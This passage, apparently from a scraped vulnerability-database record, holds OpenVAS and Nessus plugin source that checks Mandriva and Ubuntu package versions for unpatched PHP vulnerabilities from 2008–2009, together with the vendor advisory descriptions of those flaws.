validation, which has\nunknown impact and attack vectors, probably related to an ability to\nspoof certificates (CVE-2009-3291).\n\nUnspecified vulnerability in PHP before 5.2.11 has unknown impact\nand attack vectors related to missing sanity checks around exif\nprocessing. (CVE-2009-3292)\n\nUnspecified vulnerability in the imagecolortransparent function in\nPHP before 5.2.11 has unknown impact and attack vectors related to\nan incorrect sanity check for the color index. (CVE-2009-3293)\n\nThis update provides a solution to these vulnerabilities.\n\nAffected: Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:246\";\ntag_summary = \"The remote host is missing an update to php\nannounced via advisory MDVSA-2009:246.\";\n\n \n\nif(description)\n{\n script_id(64958);\n script_version(\"$Revision: 6587 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 08:35:35 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-28 19:09:13 +0200 (Mon, 28 Sep 2009)\");\n script_cve_id(\"CVE-2008-7068\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3293\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:246 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libphp_common432\", rpm:\"libphp_common432~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php432-devel\", rpm:\"php432-devel~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba_bundle\", rpm:\"php-dba_bundle~4.3.4~1.1.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.4~1.8.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php_common432\", rpm:\"lib64php_common432~4.3.4~4.30.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libphp4_common4\", rpm:\"libphp4_common4~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php4-cgi\", rpm:\"php4-cgi~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php4-cli\", rpm:\"php4-cli~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php4-dba_bundle\", rpm:\"php4-dba_bundle~4.4.4~1.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php4-devel\", rpm:\"php4-devel~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php4-exif\", rpm:\"php4-exif~4.4.4~1.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.1.6~1.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.1.6~1.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.1.6~1.1.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php4_common4\", rpm:\"lib64php4_common4~4.4.4~1.12.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.1.6~1.14.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libphp_common432\", rpm:\"libphp_common432~4.3.4~4.30.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php432-devel\", rpm:\"php432-devel~4.3.4~4.30.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~4.3.4~4.30.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~4.3.4~4.30.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.4~1.8.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-01T06:57:13", "description": "Maksymilian Arciemowicz discovered that PHP did not properly validate\narguments to the dba_replace function. If a script passed untrusted\ninput to the dba_replace function, an attacker could truncate the\ndatabase. This issue only applied to Ubuntu 6.06 LTS, 8.04 LTS, and\n8.10. (CVE-2008-7068)\n\nIt was discovered that PHP's php_openssl_apply_verification_policy\nfunction did not correctly handle SSL certificates with zero bytes in\nthe Common Name. A remote attacker could exploit this to perform a man\nin the middle attack to view sensitive information or alter encrypted\ncommunications. (CVE-2009-3291)\n\nIt was discovered that PHP did not properly handle certain malformed\nimages when being parsed by the Exif module. A remote attacker could\nexploit this flaw and cause the PHP server to crash, resulting in a\ndenial of service. (CVE-2009-3292)\n\nGrzegorz Stachowiak discovered that PHP did not properly enforce\nrestrictions in the tempnam function. An attacker could exploit this\nissue to bypass safe_mode restrictions. (CVE-2009-3557)\n\nGrzegorz Stachowiak discovered that PHP did not properly enforce\nrestrictions in the posix_mkfifo function. An attacker could exploit\nthis issue to bypass open_basedir restrictions. (CVE-2009-3558)\n\nBogdan Calin discovered that PHP did not limit the number of temporary\nfiles created when handling multipart/form-data POST requests. A\nremote attacker could exploit this flaw and cause the PHP server to\nconsume all available resources, resulting in a denial of service.\n(CVE-2009-4017)\n\nATTENTION: This update changes previous PHP behaviour by limiting the\nnumber of files in a POST request to 50. This may be increased by\nadding a 'max_file_uploads' directive to the php.ini configuration\nfile.\n\nIt was discovered that PHP did not properly enforce restrictions in\nthe proc_open function. An attacker could exploit this issue to bypass\nsafe_mode_protected_env_vars restrictions and possibly execute\narbitrary code with application privileges. (CVE-2009-4018).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "published": "2009-11-30T00:00:00", "title": "Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 / 9.10 : php5 vulnerabilities (USN-862-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3558", "CVE-2009-4018", "CVE-2009-3292", "CVE-2008-7068", "CVE-2009-4017", "CVE-2009-3291", "CVE-2009-3557"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5", "p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5filter", "p-cpe:/a:canonical:ubuntu_linux:php5-mhash", "p-cpe:/a:canonical:ubuntu_linux:php5-curl", "p-cpe:/a:canonical:ubuntu_linux:php5-pspell", "p-cpe:/a:canonical:ubuntu_linux:php5-mysql", "p-cpe:/a:canonical:ubuntu_linux:php5-cgi", "p-cpe:/a:canonical:ubuntu_linux:php5-cli", "p-cpe:/a:canonical:ubuntu_linux:php5-odbc", "p-cpe:/a:canonical:ubuntu_linux:php5-sqlite", "p-cpe:/a:canonical:ubuntu_linux:php5-xmlrpc", "p-cpe:/a:canonical:ubuntu_linux:php5-gd", "p-cpe:/a:canonical:ubuntu_linux:php5-xsl", "p-cpe:/a:canonical:ubuntu_linux:php5-sybase", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:php5-dev", "p-cpe:/a:canonical:ubuntu_linux:php5-common", "p-cpe:/a:canonical:ubuntu_linux:php5-pgsql", "p-cpe:/a:canonical:ubuntu_linux:php5-dbg", "cpe:/o:canonical:ubuntu_linux:9.10", "p-cpe:/a:canonical:ubuntu_linux:php5-mysqli", "p-cpe:/a:canonical:ubuntu_linux:php5-ldap", "p-cpe:/a:canonical:ubuntu_linux:php5-tidy", "cpe:/o:canonical:ubuntu_linux:8.10", "p-cpe:/a:canonical:ubuntu_linux:php5-recode", "p-cpe:/a:canonical:ubuntu_linux:php5", "cpe:/o:canonical:ubuntu_linux:9.04", "p-cpe:/a:canonical:ubuntu_linux:php5-snmp", "p-cpe:/a:canonical:ubuntu_linux:php5-gmp", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts", "p-cpe:/a:canonical:ubuntu_linux:php-pear"], "id": "UBUNTU_USN-862-1.NASL", "href": "https://www.tenable.com/plugins/nessus/42930", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-862-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42930);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:33:02\");\n\n script_cve_id(\"CVE-2008-7068\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-4017\", \"CVE-2009-4018\");\n script_bugtraq_id(36449, 37079, 37138);\n script_xref(name:\"USN\", value:\"862-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 / 9.10 : php5 vulnerabilities (USN-862-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Maksymilian Arciemowicz discovered that PHP did not properly validate\narguments to the dba_replace function. If a script passed untrusted\ninput to the dba_replace function, an attacker could truncate the\ndatabase. This issue only applied to Ubuntu 6.06 LTS, 8.04 LTS, and\n8.10. (CVE-2008-7068)\n\nIt was discovered that PHP's php_openssl_apply_verification_policy\nfunction did not correctly handle SSL certificates with zero bytes in\nthe Common Name. A remote attacker could exploit this to perform a man\nin the middle attack to view sensitive information or alter encrypted\ncommunications. (CVE-2009-3291)\n\nIt was discovered that PHP did not properly handle certain malformed\nimages when being parsed by the Exif module. A remote attacker could\nexploit this flaw and cause the PHP server to crash, resulting in a\ndenial of service. (CVE-2009-3292)\n\nGrzegorz Stachowiak discovered that PHP did not properly enforce\nrestrictions in the tempnam function. An attacker could exploit this\nissue to bypass safe_mode restrictions. (CVE-2009-3557)\n\nGrzegorz Stachowiak discovered that PHP did not properly enforce\nrestrictions in the posix_mkfifo function. An attacker could exploit\nthis issue to bypass open_basedir restrictions. (CVE-2009-3558)\n\nBogdan Calin discovered that PHP did not limit the number of temporary\nfiles created when handling multipart/form-data POST requests. A\nremote attacker could exploit this flaw and cause the PHP server to\nconsume all available resources, resulting in a denial of service.\n(CVE-2009-4017)\n\nATTENTION: This update changes previous PHP behaviour by limiting the\nnumber of files in a POST request to 50. This may be increased by\nadding a 'max_file_uploads' directive to the php.ini configuration\nfile.\n\nIt was discovered that PHP did not properly enforce restrictions in\nthe proc_open function. An attacker could exploit this issue to bypass\nsafe_mode_protected_env_vars restrictions and possibly execute\narbitrary code with application privileges. (CVE-2009-4018).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/862-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mhash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mysqli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|8\\.04|8\\.10|9\\.04|9\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 8.04 / 8.10 / 9.04 / 9.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php-pear\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-cgi\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-cli\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-common\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-curl\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-dev\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-gd\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-ldap\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mhash\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mysql\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mysqli\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-odbc\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-pgsql\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-recode\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-snmp\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-sqlite\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-sybase\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-xmlrpc\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-xsl\", pkgver:\"5.1.2-1ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php-pear\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-cgi\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-cli\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-common\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-curl\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-dev\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-gd\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-gmp\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-ldap\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-mhash\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-mysql\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-odbc\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-pgsql\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-pspell\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-recode\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-snmp\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-sqlite\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-sybase\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-tidy\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-xmlrpc\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-xsl\", pkgver:\"5.2.4-2ubuntu5.9\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libapache2-mod-php5filter\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php-pear\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-cgi\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-cli\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-common\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-curl\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-dbg\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-dev\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-gd\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-gmp\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-ldap\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-mhash\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-mysql\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-odbc\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-pgsql\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-pspell\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-recode\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-snmp\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-sqlite\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-sybase\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-tidy\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-xmlrpc\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"php5-xsl\", pkgver:\"5.2.6-2ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libapache2-mod-php5filter\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php-pear\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5\", 